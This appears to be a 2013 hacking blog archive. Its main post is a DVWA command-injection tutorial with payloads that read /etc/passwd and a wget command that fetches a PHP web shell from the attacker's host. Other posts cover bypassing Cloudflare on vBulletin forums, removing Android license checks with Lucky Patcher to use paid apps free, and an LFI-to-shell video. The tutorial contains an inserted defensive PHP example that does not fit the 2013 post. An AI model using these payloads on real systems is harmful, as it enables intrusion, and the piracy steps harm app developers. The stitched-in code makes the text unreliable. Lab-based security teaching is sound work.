Tuesday, 14 May 2013

C0mmand Executi0n Tut0rial - DVWA Low & Medium Level

************THIS TUTORIAL IS FOR EDUCATIONAL PURPOSE ONLY*************

Hello guys,
Today I'll be showing you how to exploit command execution vulnerabilities. I will perform this attack on DVWA (Damn Vulnerable Web App). It can be downloaded and installed easily. But for those who are following my tutorials, installing Metasploitable-Linux is enough, because DVWA is installed in it; just open the IP in your browser and click on DVWA.
The default username and password for it are:
User: admin
Password: password

Command execution can be the most dangerous vulnerability you can find in a website/server. It will allow you to simply backconnect with netcat, or upload your shell in a matter of seconds!
Command execution will allow you to execute commands on the target server whether it's Windows or Linux.

So let's start exploiting!

Let's start with the Low level in DVWA.

The source is:

<?php

if( isset( $_POST[ 'submit' ] ) ) {

    $target = $_REQUEST[ 'ip' ];

    // Determine OS and execute the ping command.
    if (stristr(php_uname('s'), 'Windows NT')) {

        $cmd = shell_exec( 'ping ' . $target );
        echo '<pre>'.$cmd.'</pre>';

    } else {

        $cmd = shell_exec( 'ping -c 3 ' . $target );
        echo '<pre>'.$cmd.'</pre>';

    }

}
?>

As you can see in the code above, it doesn't check whether your input is an IP, or whether it contains '&&', '||' or ';'. '&&' means AND, '||' means OR, and the semicolon means the end of a command.
So let's try to run something like:
google.com && ls

The output will be like the image below:



Note that a list of files was printed after the ping result. That's what the command "ls" does! So it's working, now let's have more fun!

Execute this command:
google.com && uname -a && id && cat /etc/passwd



Well, it's time to own the system now! The commands are executing with no errors. Let's try to get a shell on their system; for that we need a shell in .txt on a different server. I have a shell on my localhost, so let's use that:



All you have to do is run wget to get the shell, then change the name from SecurityGeeks.txt to SecurityGeeks.php.
This command will do it all:

google.com && wget YOUR_IP_ADDRESS/SecurityGeeks.txt && mv SecurityGeeks.txt SecurityGeeks.php
wget will get the shell, mv will change the name. You can get your IP address by running "ipconfig" in Windows CMD or "ifconfig" in a Linux terminal.

So let's try!



The command ran successfully, let's check if our shell is there!

The shell will be in the same directory you're in, so just add /YourShellName.php to the link!



Nice! Now you have full, easier-to-use shell access! You can also get root access; if you followed my Metasploit tutorials, you'll know how!

OK! Now that we've got the low level, let's switch to the medium level in DVWA and try to get the same access we got now!

In medium level, they added a little bit of security to the code, but it's not enough.
The code in medium is:

<?php

if( isset( $_POST[ 'submit'] ) ) {

    $target = $_REQUEST[ 'ip' ];

    // Remove any of the characters in the array (blacklist).
    $substitutions = array(
        '&&' => '',
        ';' => '',
    );

    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );

    // Determine OS and execute the ping command.
    if (stristr(php_uname('s'), 'Windows NT')) {

        $cmd = shell_exec( 'ping ' . $target );
        echo '<pre>'.$cmd.'</pre>';

    } else {

        $cmd = shell_exec( 'ping -c 3 ' . $target );
        echo '<pre>'.$cmd.'</pre>';

    }
}

?>

As you can see in the code above, they banned the characters ';' and '&&', but it's not really enough, because we have another option, which is '||'.

But it's a little different with this one, because it means OR: the shell runs the command after '||' only when the command before it fails, so it doesn't always execute it when there is another command before it. So the way to use this one will be different than before: we won't add "google.com" then '&& COMMAND', but we will put '|| COMMAND' without anything before it!

Let's just give it a try and see if it's working!



The command 'ls' is working, everything is going fine!
But now, you can only use ONE command each time.
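
For comparison with the low and medium handlers above, here is an added example (not DVWA's code and not part of the original post) of the same ping handler using an allow-list instead of a blacklist: the input must be a literal IPv4 address, and it is still passed through escapeshellarg(). The function names medium_filter(), validate_target() and build_ping_command() are hypothetical, the sample inputs are constructed from the strings used in this post, and rejecting hostnames is an assumption made because the form field is named 'ip'.

```php
<?php
// Added example, not DVWA's own code. Function names are hypothetical.

// The medium-level blacklist from the post, kept here for comparison.
function medium_filter(string $input): string
{
    return str_replace(['&&', ';'], '', $input);
}

// Allow-list: accept only a literal IPv4 address, reject everything else.
function validate_target(string $input): ?string
{
    $input = trim($input);
    $ip = filter_var($input, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4);
    return $ip === false ? null : $ip;
}

// Build the ping command line, or return null if the input is rejected.
function build_ping_command(string $input): ?string
{
    $ip = validate_target($input);
    if ($ip === null) {
        return null;
    }
    $isWindows = stristr(php_uname('s'), 'Windows NT') !== false;
    // escapeshellarg() is defence in depth: the value is already a bare IP.
    return ($isWindows ? 'ping ' : 'ping -c 3 ') . escapeshellarg($ip);
}

// Constructed sample inputs: one valid address and the two strings from the post.
$samples = ['127.0.0.1', 'google.com && ls', '|| ls'];

foreach ($samples as $sample) {
    $command = build_ping_command($sample);
    printf(
        "input: %-20s blacklist leaves: %-18s allow-list: %s\n",
        var_export($sample, true),
        var_export(medium_filter($sample), true),
        $command ?? 'REJECTED'
    );
}
```

Only the first sample produces a command line; the blacklist leaves '|| ls' untouched, while the allow-list rejects both strings from the post.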

Hope you enjoyed it!

Thursday, 9 May 2013

Top 10 Easy And Powerful Website Building Software

People who do not have any technical knowledge can take advantage of website building
tools. These tools can be of great help when you want to get your work done. Students,
workers, designers, developers, artists, supervisors, homemakers and others can
use these tools, as they are simple and highly advantageous. Most of the tools are not popular,
but the features they offer are amazing.

Today everybody searches the internet for his or her queries. This has made it necessary for
every business to have an online presence. Building a website is considered a tough job, but
not now, with the help of these top ten powerful and easy website building software.

1. Icono Sites

This tool is easy and free to create websites. It will just take a few minutes with the building
option on the website. You can choose the website designs of your choice from a bouquet of
beautiful layouts.

2. Google sites

This is the simplest but powerful tool to build up sites. This tool offers you with the different
choices of the pre-built templates. You can also access and share information with other
administration.

3. Tripod

This tool is powered by Zeeblio which enables the drag and drop abilities. It offers 200
templates from which you can choose your design. This tool is best for eCommerce sites.

4. Doomby
You can easily create your websites with this tool without paying any money. This tool
also offers a powerful and effective back end. It also offers you the correct website statistics.

5. Ucoz

This is the first choice of millions of website users. It provides you with 22 modules and 250
templates. This tool is best for the people having a limited budget.

6. Webnode

This tool allows its users to develop, run, design and create free web applications and websites
from beginning to end. This tool can produce high quality professional pages.

7. Snap pages

You can create your own personal website for free with this tool. You can also share your
images, blogs and other stuff with friends and family. The tool is simple and easy to use. For
professional site design, you can subscribe to the premium version.

8. Webriq

This tool is free and you can optimize your site with your mobile browser. It has both the free
and premium version.

9. 350

Those who do not have any knowledge about the languages of computer are highly benefitted
with this tool. You can try the demo version and then subscribe to the premium version.

10. Weebly

With the help of this tool, you will get the simplest way to create a website. This tool enables
the users to spend most of the time on content, which is its best feature.

Try all these tools and their different features. Websites are great mediums by which
you can attract lots of customers and showcase your products and services, and these tools will
help you reach your target.



About The Author: Claudia is a blogger and she has written various articles on Hadoop Online Training and other training programs. She is also an author of many books, follow me @ITdominus1.

Wednesday, 8 May 2013

How To Bypass vBulletin Forums Cloudflare - New Method


Hello guys,
Another video tutorial by Foloox on how to bypass cloudflare. New cool methods that I've never used. :)
The tutorial is on his channel, please subscribe to his channel!

The script used in the second method can be found here:
http://pastie.securitygeeks.net/47


The video is AVAILABLE in HD, just change the quality!
Enjoy! ^_^

Tuesday, 7 May 2013

How To Remove The License Verification From Android App/Games Using Lucky Patcher



Hello guys, today I'm going to show you how to remove the license verification from apps and games. License verification can be found in all paid apps, to check if you actually bought the app/game or downloaded it from somewhere else. Well, today we will remove that license verification and use paid apps for free, or most of them.

For this tutorial we will be using AfterMath XHD, which is a paid game on Google Play, as a demo.

For this tutorial we need:

  • Rooted Android Device
  • Lucky Patcher (Can Be Downloaded here)
  • A Paid game to try to remove the License Verification from it

So, before I remove the license from the game, the game doesn't start because our license is invalid,
as you can see in the picture below:


Now launch Lucky Patcher. It WILL need root permissions, so grant it root permissions. When it opens, it shows the list of all the apps with Google Ads, License Verification, and some more. (You can see my tutorial about removing Google ads from apps HERE)


Click on the app or the game you want to patch. A screen with some information about the game will show, like the picture below:



Click on "Open Menu Of Patches" at the bottom of the page:


Click on "Remove License Verification"; a list of patches will show.


The patch you chose will already be selected for you, so just click on Apply and it will start processing.


Now all you have to do is wait until it finishes and gives you the result:


You're done! Now launch the app you patched, and it will work just fine!


This process can patch many apps, including famous ones like SPB Shell 3D! And the game above is one of the top paid games in the Google Store too.
Have fun, and try patching the apps you want!
Enjoy!

Monday, 6 May 2013

Local File Inclusion To Php Shell - LFI Tutorial



Hello guys,
Today I have another tutorial submitted by Foloox Csl. It's a simple LFI tutorial, to upload a shell using an LFI vulnerability.

Enjoy! And please subscribe to him.



Best Watched in HD!